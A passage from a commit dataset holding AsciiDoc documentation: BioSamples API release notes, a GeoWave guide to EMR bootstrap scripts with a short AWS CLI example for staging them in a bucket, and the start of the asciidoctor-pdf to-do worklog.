supports\nhttps:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Compression[compression]\nand https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Caching[caching]\nthrough standard mechanisms.\n* Java client using Spring, and a Spring-Boot starter module for easy\nuse. This is used by BioSamples internally and other teams at EMBL-EBI,\nso is high performance and battle tested.\n* Containerisation using Docker and Docker-Compose, which makes it\neasier to run a local version for client development or for local\nstorage of sample information.\n\n[[data-content]]\nData content\n~~~~~~~~~~~~\n\n* Ontology terms: Numeric tax IDs (e.g. 9606) and short ontology terms\n(e.g.\u00a0PATO:0000384) are being replaced with full IRIs (e.g.\nhttp:\/\/purl.obolibrary.org\/obo\/NCBITaxon_9606\u00a0and\u00a0http:\/\/purl.obolibrary.org\/obo\/PATO_0000384\u00a0)\nin many places, eventually everywhere.\n* Groups will continue to exist for backwards compatibility purposes.\nHowever, we are investigating future development to reduce or remove\nmany of these in favour of alternatives such as filtering samples by\nexternal link, or delegating grouping of samples to other EMBL-EBI\narchives such as https:\/\/www.ebi.ac.uk\/biostudies[BioStudies].\n\n[[jsonbiosamples]]\nJSON\u00a0`\/biosamples`\n~~~~~~~~~~~~~~~~~~\n\nThis is the preferred API for use, and uses the same URIs as the HTML\npages, utilising\u00a0content negotiation\u00a0to provide a JSON response.\nThis is designed as\na\u00a0https:\/\/en.wikipedia.org\/wiki\/Hypertext_Application_Language[hypermedia\nas the engine of application state (HATEOAS) API]\u00a0and therefore we\nrecommend users do not use specific URLs but rather follow relationships\nbetween API endpoints, much like a user would use links between HTML\npages. It is similar to the `\/biosamples\/api`\u00a0JSON format, with a few\ncritical differences:\n\n* added __release__\u00a0in full\u00a0ISO 8601 format including time. 
The\nbackwards-compatible\u00a0__releaseDate__ exists but should be considered\ndeprecated and will be removed in a future release.\n* added\u00a0__update__\u00a0in full\u00a0ISO 8601\u00a0format including time.\nThe\u00a0backwards-compatible\u00a0__updateDate__ exists but should be considered\ndeprecated and will be removed in a future release.\n* removed\u00a0__description__\u00a0as a separate field, is now available as\na\u00a0__characteristic__.\u00a0\n* remove\u00a0**relations**\u00a0rel link; equivalent information is now embedded\nin sample in __relationships__\u00a0and\u00a0__externalReferences__\u00a0lists.\n* remove\u00a0**sample**\u00a0rel link; with relations now embedded, this link\nserves no purpose.\n* added\u00a0**curationLinks**\u00a0rel link.\n* ordering may be different.\n* fields are not displayed if empty or null.\n* characteristic names accurately reflect what was submitted and may now\nbe multiple words and may include non alphanumeric characters (e.g\nbrackets, greek letters, etc). In the `\/biosamples\/api` responses\ncharacteristic names were always camelCased and with non-alphanumeric\ncharacters removed.\n* external references directly embedded in the samples and the groups.\n\n[[xmlbiosamplesxml]]\nXML\u00a0`\/biosamples\/xml`\n~~~~~~~~~~~~~~~~~~~~~\n\nWe are maintaining this for backwards compatibility. Later in 2018 we\nwill be consulting about future development of this API, particularly in\nthe context of the improved JSON `\/biosamples` API using content\nnegotiation and several long-standing issues with limitations arising\nfrom the XML schema in use.\n\n* XML element *TermSourceREF* element *Name* and element *URI* are\nremoved.\n* XML element *Property* attributes characteristic and comment always\nfalse.\n* elements and attributes may be in different order.\n* allows only one IRI on attributes, so in rare cases of multiple IRIs\nwill not be complete.\n* Query parameter `query` has now a default value of * if none is\nprovided.\n* Query parameter `sort` is ignored for the search, due to undefined\nbehaviour and lack of usage.\n\n[[json-biosamplesapi]]\nJSON `\/biosamples\/api`\n~~~~~~~~~~~~~~~~~~~~~~\n\nThis API should be considered **deprecated**\u00a0and we will aim to remove\nit by 2019. Any users of this should move to using the `\/biosamples`\nURIs to retrieve JSON representations with an improved schema via\ncontent negotiation. Further announcements will be made in future for\nspecific updates and deadlines.\n\n* ordering may be different from previous versions, and is not\nguaranteed for future versions.\n* fields are not displayed if empty or null.\n* `\/api\/externallinksrelations\/{id}\/sample` and\n`\/api\/externallinksrelations\/{id}\/group` are removed due to lack of\nusage.\n* fixed _externalReferences_ and _publications_ to be nested objects and\nnot JSON strings.\n\n[[acknowledgements]]\nAcknowledgements\n~~~~~~~~~~~~~~~~\n\nThis release has been made possible with the support of our funders:\n\n* EMBL-EBI Core Funds\n* EC -ELIXIR-EXCELERATE \n* WT- HIPSCI\n* IMI - EBiSC\n* ELIXIR \u2013 Meta Data Implementation Study \n* WT-GA4GH\n","old_contents":"= [.ebi-color]#Release notes#\n:toc: auto\n\nThis pages contains links to release notes for BioSamples for version 4.0.0 and higher. 
This release represents a comprehensive overhaul and therefore previous release notes are no longer applicable.\n\n[[section]]\n4.1.3\n----\n\n* Additional sample attributes required by ENA are now available including a single, top-level taxId field\n* The export box for a sample is now renamed download and contains a list of serialisations that always download as a file fixing a blocked popups issue in Safari\n* The search results now have an updated look and feel based on feedback from ENA\n\n[[section]]\n4.1.2\n----\n\n* Sample JSON now contains a numeric taxId field at the top level\n* IRI of ontology terms now resolve to the defining ontology when they are available in multiple ontologies\n* Requests for a sample now contain a computed ETag header to identify changes\n* When requesting a private sample an explanation message is now provided in addition to the 403 error code\n* The search UI now contains a clear filters button\n\n\n[[section]]\n4.1.1\n----\n\n* Expose the BioSchemas markup with enhanced context and Sample ontology code\n* SampleTab submission pipeline has been rewritten for better robustness\n* In the samples results page, the sample name and the sample accession are now linking to the single sample page\n* Fixed various broken hyperlinks on the home page and in documentation\n\n\n[[section]]\n4.1.0\n----\n\n### New features\n\n* GDPR:\n** SampleTab submissions enforce explicit acceptance of the terms of service and the privacy information\n** GDPR notices added throughout\n* SampleTab where targets of relationships are neither sample name nor sample accession are now rejected, providing user additional information on the problematic data\n* *Bioschema.org* entities are exported in BioSamples and available both in the UI - embedded in a script tag - and through the API\n\n### Bug fixes\n* Solved issues with wrong header\u2019s hyperlinks\n* Solved issue with resolving relationship by name in SampleTab submissions\n* Solved issue with converting DatabaseURI to external references in SampleTab submissions\n* Improved special characters handling in SampleTab submissions\n\n\n[[section]]\n4.0.7\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* GDPR notices\n* Update format of the Sitemap file\n\n[[section]]\n4.0.6\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Improves search handling of special characters in facets\n* Improves search handling of special characters in search terms\n* Fix issue with curation link URLs\n* Implemented DataCatalog, Dataset and DataRecord profiles on JSON+LD\n* Add ability to control which curation domains are applied to a sample\n* Updated and improved API documentation\n* Updated and improved SampleTab documentation\n* Fix links to XML and JSON serialisation in the UI\n* Fix bug in handling special characters in SampleTab submission\n* Add export pipeline\n* Add copy down pipeline\n\n[[section]]\n4.0.5\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Improved consistency of paged search results if any of the samples are added or modified whilst paging\n* Improved search update throughput by using Solr transaction log \n* Updated JSON+LD format to the latest version\n* Correctly accept XML sample groups and their related samples\n* Fix issue related to search query terms not being applied to legacy XML and legacy JSON endpoints.\n* Fix incorrect HAL links on autocomplete endpoint\n* Replace SampleTab submitted relationships by name with accessions. 
As a consequence, they can now be consistently cross referenced by accession in user interface and API\n* Improved indexing of samples when they are rapidly updated or curated\n* Updated Elixir Deposition Database banner URL\n* Reduce number of Zooma calls by not attempting to map \"unknown\" or \"other\" attributes\n* Reduce load on OLS by ensuring Zooma does not requery OLS as any results from OLS would not be used by BioSamples\n\n[[section]]\n4.0.4\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Persistence of search terms and filters when using HAL paging links\n* SameAs relation in the legacy JSON API works as intended\n* Removed residual test endpoints from legacy JSON API\n* Details relation in legacy JSON API now correctly resolves\n* Added informative and specific title to webpages\n* Added https:\/\/www.elixir-europe.org\/platforms\/data\/elixir-deposition-databases[Elixir Deposition Database] banner \n\n[[section]]\n4.0.3\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Forward legacy group URLs \/biosamples\/groups\/SAMEGxxxx to \/biosamples\/samples\/SAMEGxxxxx\n* Missing or malformed update and release date on legacy XML group submission will default to current datetime. It is not recommended that users intentionally rely on this.\n* Index legacy XML group submissions, which was not happening due to an unexpected consequence of the interaction of components. \n* Redirect \/biosamples\/sample and \/biosamples\/group URLs in case of typo \n\n[[section]]\n4.0.2\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Fix javascript on SampleTab submission and accession\n* Handle load-balanced accessioning\n* Fix for storage of relationships source on new samples\n\n[[section]]\n4.0.1\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Fix submission of new unaccessioned samples with relationships by inserting an assigned accession into the source of any relationships that are missing it. \n* Fix curation pipeline of numeric organism iri to \"http:\/\/purl.obolibrary.org\/obo\/NCBITaxon_+taxId\" when it should be \"http:\/\/purl.obolibrary.org\/obo\/NCBITaxon_\"+taxId e.g. http:\/\/purl.obolibrary.org\/obo\/NCBITaxon_9606\n* Allow CORS requests for legacy XML APIs.\n* Updated homepage project sample links to use a filter search rather than a text search.\n\n[[section]]\n4.0.0\n-----\n\nVersion v4.0.0 represents a re-architecture and re-engineering of the\nBioSamples software stack. It is now based on the Java\nhttps:\/\/projects.spring.io\/spring-boot[Spring-Boot] framework, utilising\nhttps:\/\/www.mongodb.com[MongoDB] for storage and\nhttps:\/\/lucene.apache.org\/solr[Solr] for indexing and search. It tries\nto follow up-to-date web standards and conventions, while remaining\nbackwards compatible. This will also give us a strong and stable\nfoundation to build more features and improvements from, more reliably\nand more rapidly.\n\nHighlights include:\n\n* Submissions and updates will be available immediately via accession,\nand will be available via search within a few minutes or less. 
There is\nalso improved handling of submissions and updates, with fewer errors and\nbetter feedback about any problems.\n* Integration with https:\/\/aap.tsi.ebi.ac.uk[EBI AAP] for login\nmanagement and access to pre-publication samples, including use of\nhttps:\/\/www.elixir-europe.org\/services\/compute\/aai[ELIXIR AAI] single\nsign-on accounts.\n* Separation of submitted sample information from curation of that\ninformation, including the ability for 3rd party (re-)curation of\nsamples. Please contact us if you would be interested in more\ninformation and\/or to supply curation information.\n* Improved handling of non-alphanumeric characters in attribute types\ne.g. \"geographic location (country and\/or sea)\"\n* Improved faceting allowing selection of multiple values within same\nfacet, fixed re-use and re-distribution of search URLs. This will be\nexpanded in future with additional facet types where appropriate.\n* Support and recommend the use\nof\u00a0https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Content_negotiation[content\nnegotiation] to accessing multiple formats at the same URIs. In addition\nto the content (HTML vs XML vs JSON) this also supports\nhttps:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Compression[compression]\nand https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Caching[caching]\nthrough standard mechanisms.\n* Java client using Spring, and a Spring-Boot starter module for easy\nuse. This is used by BioSamples internally and other teams at EMBL-EBI,\nso is high performance and battle tested.\n* Containerisation using Docker and Docker-Compose, which makes it\neasier to run a local version for client development or for local\nstorage of sample information.\n\n[[data-content]]\nData content\n~~~~~~~~~~~~\n\n* Ontology terms Numeric tax IDs (e.g. 9606) and short ontology terms\n(e.g.\u00a0PATO:0000384) are being replaced with full IRIs (e.g.\nhttp:\/\/purl.obolibrary.org\/obo\/NCBITaxon_9606\u00a0and\u00a0http:\/\/purl.obolibrary.org\/obo\/PATO_0000384\u00a0)\nin many places, eventually everywhere.\n* Groups will continue to exist for backwards compatibility purposes.\nHowever, we are investigating future development to reduce or remove\nmany of these in favour of alternatives such as filtering samples by\nexternal link, or delegating grouping of samples to other EMBL-EBI\narchives such as https:\/\/www.ebi.ac.uk\/biostudies[BioStudies].\n\n[[jsonbiosamples]]\nJSON\u00a0`\/biosamples`\n~~~~~~~~~~~~~~~~~~\n\nThis is the preferred API for use, and uses the same URIs as the HTML\npages, and utilising\u00a0content negotiation\u00a0to provide a JSON response.\nThis is designed as\na\u00a0https:\/\/en.wikipedia.org\/wiki\/Hypertext_Application_Language[hypermedia\nas the engine of application state (HATEOS) API]\u00a0and therefore we\nrecommend users do not use specific URLs but rather follow relationships\nbetween API endpoints, much like a user would use links between HTML\npages. It is similar to the `\/biosamples\/api`\u00a0JSON format, with a few\ncritical differences:\n\n* added __release__\u00a0in full\u00a0ISO 8601 format including time. 
The\nbackwards-compatible\u00a0__releaseDate__ exists but should be considered\ndeprecated and will be removed in a future release.\n* added\u00a0__update__\u00a0in full\u00a0ISO 8601\u00a0format including time.\nThe\u00a0backwards-compatible\u00a0__updateDate__ exists but should be considered\ndeprecated and will be removed in a future release.\n* removed\u00a0__description__\u00a0as a separate field, is now available as\na\u00a0__characteristic__.\u00a0\n* remove\u00a0**relations**\u00a0rel link; equivalent information is now embedded\nin sample in __relationships__\u00a0and\u00a0__externalReferences__\u00a0lists.\n* remove\u00a0**sample**\u00a0rel link; with relations now embedded, this link\nserves no purpose.\n* added\u00a0**curationLinks**\u00a0rel link.\n* ordering may be different.\n* fields are not displayed if empty or null.\n* characteristic names accurately reflect what was submitted and may now\nbe multiple words and may include non alphanumeric characters (e.g\nbrackets, greek letters, etc). In the `\/biosamples\/api` responses\ncharacteristic names were always camelCased and with non-alphanumeric\ncharacters removed.\n* external references directly embedded in the samples and the groups.\n\n[[xmlbiosamplesxml]]\nXML\u00a0`\/biosamples\/xml`\n~~~~~~~~~~~~~~~~~~~~~\n\nWe are maintaining this for backwards compatibility. Later in 2018 we\nwill be consulting about future development of this API, particularly in\nthe context of the improved JSON `\/biosamples` API using content\nnegotiation and several long-standing issues with limitations arising\nfrom the XML schema in use.\n\n* XML element *TermSourceREF* element *Name* and element *URI* are\nremoved.\n* XML element *Property* attributes characteristic and comment always\nfalse.\n* elements and attributes may be in different order.\n* allows only one IRI on attributes, so in rare cases of multiple IRIs\nwill not be complete.\n* Query parameter `query` has now a default value of * if none is\nprovided.\n* Query parameter `sort` is ignored for the search, due to undefined\nbehaviour and lack of usage.\n\n[[json-biosamplesapi]]\nJSON `\/biosamples\/api`\n~~~~~~~~~~~~~~~~~~~~~~\n\nThis API should be considered **deprecated**\u00a0and we will aim to remove\nit by 2019. Any users of this should move to using the `\/biosamples`\nURIs to retrieve JSON representations with an improved schema via\ncontent negotiation. 
Further announcements will be made in future for\nspecific updates and deadlines.\n\n* ordering may be different from previous versions, and is not\nguaranteed for future versions.\n* fields are not displayed if empty or null.\n* `\/api\/externallinksrelations\/{id}\/sample` and\n`\/api\/externallinksrelations\/{id}\/group` are removed due to lack of\nusage.\n* fixed _externalReferences_ and _publications_ to be nested objects and\nnot JSON strings.\n\n[[acknowledgements]]\nAcknowledgements\n~~~~~~~~~~~~~~~~\n\nThis release has been made possible with the support of our funders:\n\n* EMBL-EBI Core Funds\n* EC -ELIXIR-EXCELERATE \n* WT- HIPSCI\n* IMI - EBiSC\n* ELIXIR \u2013 Meta Data Implementation Study \n* WT-GA4GH\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef81a522556f724113e36be494b1308a4c570f18","subject":"changed wording on links (#1362)","message":"changed wording on links (#1362)\n\n","repos":"ngageoint\/geowave,spohnan\/geowave,ngageoint\/geowave,ngageoint\/geowave,spohnan\/geowave,locationtech\/geowave,spohnan\/geowave,locationtech\/geowave,locationtech\/geowave,ngageoint\/geowave","old_file":"docs\/content\/aws-env\/007-quickstart-guide-scripts.adoc","new_file":"docs\/content\/aws-env\/007-quickstart-guide-scripts.adoc","new_contents":"[[quickstart-guide-intro]]\n<<<\n\n:linkattrs:\n\n=== Bootstrap Scripts\n\n[[quickstart-guide-intro]]\nGeoWave currently supports the use of either Accumulo or HBase, so the version of the bootstrap script you \nuse when setting up your cluster will be dependent upon which system you want to use as your datastore. The bootstrap scripts help to set up geowave and your environment. Click on any of the links below to download the script.\n\n- For Accumulo use: link:http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/accumulo\/bootstrap-geowave.sh[s3:\/\/geowave\/latest\/scripts\/emr\/accumulo\/bootstrap-geowave.sh]\n- For HBase use: link:http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/hbase\/bootstrap-geowave.sh[s3:\/\/geowave\/latest\/scripts\/emr\/hbase\/bootstrap-geowave.sh]\n\nThese scripts will provide you with everything necessary to complete this guide, but will also set up Geowave if you would like to use it in other workflows. There are scripts available for each of the releases of Geowave going back to 0.9.3. These can be used by replacing ``\/latest\/`` with the desired release (i.e. ``\/0.9.3\/``) \n\n[NOTE]\n====\nWe have also provided quickstart scripts that will perform all of the steps in this guide automatically. This will allow you to verify your own steps, or test out other geowave commands and features on an already conditioned data set.\n\nIf you would prefer to have all of the steps run automatically, please use these bootstrap scripts instead of the \nones listed previously:\n\n- For Accumulo use: link:http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/quickstart\/accumulo\/bootstrap-geowave.sh[s3:\/\/geowave\/latest\/scripts\/emr\/quickstart\/accumulo\/bootstrap-geowave.sh]\n- For HBase use: link:http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/quickstart\/hbase\/bootstrap-geowave.sh[s3:\/\/geowave\/latest\/scripts\/emr\/quickstart\/hbase\/bootstrap-geowave.sh]\n====\n\nTo use one of the scripts listed above, it must be accessible from an s3 bucket. Because buckets are region specific, you may not be able to use our geowave bucket if your cluster is not deployed in the us-east-1 region. 
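One hypothetical way to stage the script yourself, assuming the AWS CLI is installed and configured (the bucket name and region below are placeholders), is:\n\n[source,bash]\n----\n# create a bucket in the region where the cluster will run\naws s3 mb s3:\/\/my-geowave-bootstrap --region us-west-2\n# copy the downloaded bootstrap script into it\naws s3 cp bootstrap-geowave.sh s3:\/\/my-geowave-bootstrap\/bootstrap-geowave.sh\n----\n\n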
In this case, you will need a personal bucket in your region that contains the desired script. Instructions on <<110-appendices.adoc#create-aws-s3-bucket, creating>> and <<110-appendices.adoc#upload-to-aws-s3-bucket, uploading>> to an s3 bucket can be found in the appendices.\n","old_contents":"[[quickstart-guide-intro]]\n<<<\n\n:linkattrs:\n\n=== Bootstrap Scripts\n\n[[quickstart-guide-intro]]\nGeoWave currently supports the use of either Accumulo or HBase, so the version of the bootstrap script you \nuse when setting up your cluster will be dependent upon which system you want to use as your datastore. The bootstrap scripts help to set up geowave and your environment. Click on any of the links below to download the script.\n\n- For Accumulo use: link:http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/accumulo\/bootstrap-geowave.sh[http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/accumulo\/bootstrap-geowave.sh, window=\"_blank\"]\n- For HBase use: link:http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/hbase\/bootstrap-geowave.sh[http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/hbase\/bootstrap-geowave.sh, window=\"_blank\"]\n\nThese scripts will provide you with everything necessary to complete this guide, but will also set up Geowave if you would like to use it in other workflows. There are scripts available for each of the releases of Geowave going back to 0.9.3. These can be used by replacing ``\/latest\/`` with the desired release (i.e. ``\/0.9.3\/``) \n\n[NOTE]\n====\nWe have also provided quickstart scripts that will perform all of the steps in this guide automatically. This will allow you to verify your own steps, or test out other geowave commands and features on an already conditioned data set.\n\nIf you would prefer to have all of the steps run automatically, please use these bootstrap scripts instead of the \nones listed previously:\n\n- For Accumulo use: link:http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/quickstart\/accumulo\/bootstrap-geowave.sh[http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/quickstart\/accumulo\/bootstrap-geowave.sh, window=\"_blank\"]\n- For HBase use: link:http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/quickstart\/hbase\/bootstrap-geowave.sh[http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/quickstart\/hbase\/bootstrap-geowave.sh, window=\"_blank\"]\n====\n\nTo use one of the scripts listed above, it must be accessible from an s3 bucket. Because buckets are region specific, you may not be able to use our geowave bucket if your cluster is not deployed in the us-east-1 region. In this case, you will need a personal bucket in your region that contains the desired script. 
Instructions on <<110-appendices.adoc#create-aws-s3-bucket, creating>> and <<110-appendices.adoc#upload-to-aws-s3-bucket, uploading>> to an s3 bucket can be found in the appendices.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2255f66cd13f72c24037a247e773e3d15a613a7","subject":"update WORKLOG","message":"update WORKLOG\n","repos":"mojavelinux\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf","old_file":"WORKLOG.adoc","new_file":"WORKLOG.adoc","new_contents":"= WORKLOG\n\n* use Groovy language specification as case study to find corner cases\n - perhaps progit2 as well; others?\n\n== TODO\n\n* backport resize method from prawn-svg and use it in converter (now in two places)\n* document fit attribute for images in running content in theming guide (or README)\n* rework resolve_image_path API so it's more logical; override based on type of first argument; document as option\n* rename inherited_align to text_align? (and base_align to base_text_align?)\n* rename text-alignment attribute to text-align? (change is within alpha.14, so still a chance to change)\n\n* implement index of index terms (#386)\n - introduce model object\n* don't crash if image in running content is an unsupported format\n* support image URL (using resolve_image_path) in running content (what about data-uri?)\n* numbering for appendix subsections is not correct; should be A.1, A.2 (#627)\n - seems like an issue in core too\n* BUG: implicit width of inline image (SVG only?) calculated incorrectly (see sandbox\/issue-494)\n* BUG: http:\/\/asciidoctor.org[Asciidoctor] surrounded by smart quotes doesn't get translated to a link (as it should)\n* FILE ISSUE draw border for quote\/verse block on right if text is aligned to the right\n* Prawn should not move cursor before placing image if image exceeds height of bounding box\n - workaround now by overriding move_text_position\n* part title \/ number (#597)\n - upper roman numeral\n - add part-label, fallback to Part (e.g., Part I)\n - only use roman numeral in toc\n* support equal column widths in header\/footer as \"columns: 3*\" (with optional leading alignment)\n* support padding for each column in running header\/footer\n* should we move files under asciidoctor\/pdf and use asciidoctor-pdf as the alias?\n* consider moving RomanNumeral into a gem named roman_numeral\n* should vertical alignment of admonition icon\/label should respect padding on content? 
or have its own padding?\n* allow general settings for admonition icon to be set using admonition_icon key prefix (e.g., admonition_icon_size)\n* allow alignment to be set on discrete heading using role\n* SIMPLE: submit pastie theme for Rouge upstream\n* SIMPLE: document autofit option on verbatim blocks (in README?)\n* SIMPLE: fill in missing defaults in theming guide\n - title_page\n - toc\n - table_header_cell\n - admonition_icon_<name>_stroke_color\n - description_list_term_font_style\n - header\/footer\n* SIMPLE: mark required keys (assume keys are optional by default)\n - required keys can never have a null value; most are set by base theme\n* SIMPLE: document vw\/vh measurement units in theming guide (make it clear it only applies in certain cases)\n* SIMPLE: in theming guide, recommend not using the fallback font when working with very large documents\n - explain that default theme uses a fallback font\n* allow font properties to be set for normal paragraph separate from base (need to think about inheritance)\n* allow alignment of list to be set separately from base align (and perhaps a hint in document) (#182)\n* FIXME: stop using fallback fonts in default theme (instead, bundle a fuller font)\n - using fallback fonts significantly slows down Prawn because it checks every letter every time (see https:\/\/github.com\/prawnpdf\/prawn\/blob\/master\/lib\/prawn\/text\/formatted\/box.rb#L427-L434)\n - add broader character range to monospace font so we can drop fallback font by default (#282)\n - consider having a fallback for prose and fallback for literal\n* SIMPLE: recommend use of prawn-gmagick in README\n - https:\/\/github.com\/packetmonkey\/prawn-gmagick\n - must install GraphicsMagick-devel on Fedora\n - or use ImageMagick (or GraphicsMagick) to uncompress PNG images before reading them\n* use <a id=\"\"><\/a> instead of <a name=\"\"><\/a> for anchor point in formatted text\n - benchmark to see if it's faster to use empty or non-empty element in parser\n* text decoration should be supported as part of theme_font\n* QUESTION: should we set pdf-anchor attribute on every node that has an id?\n - isn't it required for cross references to work?\n* QUESTION should preface subsection be numbered? (although it is numbered in DocBook and dblatex)\n* new design for keep together; necessary to get exact height accounting for gaps at page breaks\n . in dry run, set to stop when advancing to next page (override on_page_create to throw exception)\n . if less than one page, return calculation (similar to what we do now)\n . if greater than one page, clear on_page_create; move to y offset of original and start dry run again; fix calculation\n .
(if not keeping together, we can skip 1 and 2)\n* rename \"convert_content_for_\" since it can collide with existing blocks\n* don't orphan block title (make sure anchor stays with start of block)\n* QUESTION should we report full image path of gif in warning message when prawn-gmagick is not available?\n* QUESTION should we add destination to top of imported PDF page?\n - import page should accept id as section, optional argument\n* leading (line height) isn't applied when content is split across pages\n* generate fonts without PS Glyph Names to reduce file size\n - create script that can generate fonts entirely from original font source\n* if start_new_page is called at end of layout_chapter_title, and media=prepress, ghostscript reports an error\n - problem is no color space is set; can fix by calling update_colors before advancing to recto page in start_new_chapter\n - maybe introduce a skip_page helper to combine these operations?\n - upstream issues: https:\/\/github.com\/prawnpdf\/prawn\/issues\/951 and https:\/\/github.com\/prawnpdf\/prawn\/issues\/473\n* document how to test \/ use a PR\n - see https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/462#issuecomment-246200953\n - clearer instructions for how to test local development version (using rake install)\n* break printed URIs at each forward slash (and perhaps at ? and & too) (#563)\n* allow font size of dot_leader to be specified (some risk if it exceeds size of entries)\n* add empty? method to Page (instead of page_empty? on document)\n* FILE ISSUE: add option to svg method to not move cursor (in prawn-svg)\n* FILE ISSUE: in prawn: go_to_page should accept second argument that is cursor position\n* UNRESOLVED: dry_run should start at cursor of main document (or as option); total height calculation would need to be revised\n - box_height isn't currently accurate when it spans more than one page\n - this should fix height calculation when content is split over a page break (leaving small amount of excess)\n - however, if cursor is advanced to fit content on page, then that excess will cause box_height to be too large\n - life would be simpler if Prawn allowed us to draw graphics at bottom layer\n* support pdfwidth for inline image (#620)\n* allow height of inline image to be set to line height (perhaps 1em?)\n* space around inline anchors\/index entries doesn't get collapsed by text formatter\n* add support for format attribute on image macro to image-related attributes such as title-page-background-image\n - support explicit image format for cover page image and page background image\n* introduce abstract-title attribute to complement preface-title?\n* need some sort of post_construct method for converter that receives document\n - inline convert methods can get called before init_pdf\n - monkeypatch?\n* document nonfacing option more clearly (in README or theming guide)\n* create document that explains how built-in fonts are generated and what subsets are selected\n - I need instructions for myself so I know how to update\/modify the fonts\n - document in theming guide what must be done to prepare fonts (old-style 'kern' table, optionally subset) (file issue!)\n - add note to README that Prawn will subset any fonts provided\n* consider supporting icon tag in parser to simplify how inline icons are stored; simpler use of passthrough content\n* cache stateless cell data resolved from theme (don't need to recalc each time; at least per table)\n* FILE ISSUE: autowidth on table doesn't work for multi-line content 
(prawn-table bases width calculation on normalized value)\n - table ends up being stretched even though it doesn't need to be\n* table logic: does the layout_table_caption have to be inside the table block? can we pre-calculate the actual width for the caption? does the table offer a callback we can use to keep the caption on the same page as the table?\n* introduce object to store\/organize running content data and specs\n* QUESTION: should theme font handle hierarchical keys (either explicitly or implicitly)\n* need to support .canvas role on image so it isn't shrunk to fit inside top\/bottom margins\n - perhaps .canvas, .canvas-x, .canvas-y\n - allow image to span width of page (role=canvas, role=canvas-x or role=canvas-y); if role is canvas or canvas-y, then it does not consume height\n - partially addressed by vw units\n* FILE ISSUE: when split source listing, add top padding to bounding box (or is it the line metrics top?)\n - perhaps this has to do with the a miscalculation in dry run when not starting from same y position?\n - separate theme control for listing vs literal block (and maybe source too)\n* should we print alt text if an error is caught when attempting to embed an image?\n* stroke and fill multi-page sidebar block (#259) and example block (#362)\n* support URL images in running content (need to delegate to resolve_image_path)\n* rewrite optimize-pdf using rghost (#535) (also see #21 and #22)\n - add Optimizer class; wire to cli (separate issue?)\n* add feature to number bullets according to section number (needed for OpenDevise agreements)\n* outline should link to title page if there's a cover page (skip cover page and ensuing blank page)\n* might be better to organize fragments of source chunks by lines (and pass that around) to simplify post-processing\n* support negative start value for list (#498)\n - need to count negative numbers in correct direction\n* support zero-leading integers (use dedicated type like w\/ roman numerals) in reversed order lists\n* margins\/paddings at page boundaries are strange, fragile\n* implement margin collapsing (between blocks)\n - would eliminate need for negative padding for blockquote\n* bw theme for CodeRay (or Rouge) to match output of Pygments bw\n* the nested? method on list isn't checking if nested inside a block inside a list\n - need an example\n* wrapped lines in source listing should be indented to account for line number gutter (#504)\n* add sample SVG to content of chronicles-example.adoc (we do already use one for title page)\n* inline images: allow built-in font family names for SVG to be remapped\n* inline images: should we be passing absolute image path in tag or something relative (or even a lookup id?)?\n* large image runs into running footer (doesn't bottom margin need to be aligned with running footer height?)\n* should str_to_pt helper handle % and vw units?\n* allow format of printed link to be controlled by theme (similar to what we do in the manpage converter)\n* FILE ISSUE: should not wrap at formatting mark unless it's at a break opportunity\n - the problem here is that Prawn is allowing breaks at the boundaries of text fragments; it should only look at the contents\n* allow top as alternative to margin_top for all elements on title page (#431)\n* swallowing exceptions! 
(any use of e.message in a string is dangerous)\n* allow ordered list marker to be prefixed by section number (a global setting?)\n* conum not aligned vertically with callout text (perhaps too small?)\n* conum should never wrap (push it into the text if necessary)\n* decouple theme settings for section titles and discrete headings\n* decouple listing\/literal\/source theme settings; currently all under code\n* replace explicit char ranges with classes in regexp (e.g., [[:word:]] or \\w)\n* devise a way to specify a value as a string literal (variable replacement only) in theme\n* apply calculated theme values after loading?\n* allow \"content\" in place of recto_content & verso_content for running header\/footer\n - still relevant after restructuring?\n* be more specific in theming guide as to where prose_margin_top and prose_margin_bottom apply\n* allow valign value to be a number (requires change to Prawn)\n* layout SVG without using keep_together (since we know all the dimensions)\n - fix SVG to a single page (check height + caption height)\n* allow background color to be set for chapter \/ heading\n* allow border to be set around block image\n* file issue in prawn to dispatch to image handler for images it doesn't know about\n* add brief mention in theming guide that deeper customizations can be achieved by extending the converter\n - see sandbox\/asciidoctor_pdf_extensions.rb\n - reference infoq-minibook repo & blog post\n - document how to extend the converter, use Prawn\n - document how to override the Ruby code to get custom styling in the theming guide\n* is https:\/\/github.com\/packetmonkey\/prawn-pdfimage a safer way than prawn-templates to import PDF as image?\n* rename ThemeLoader to ThemeReader (or ThemeManager)?\n* normalize step leaves space after endline (i.e., `\\n `) at a hard line break (doesn't 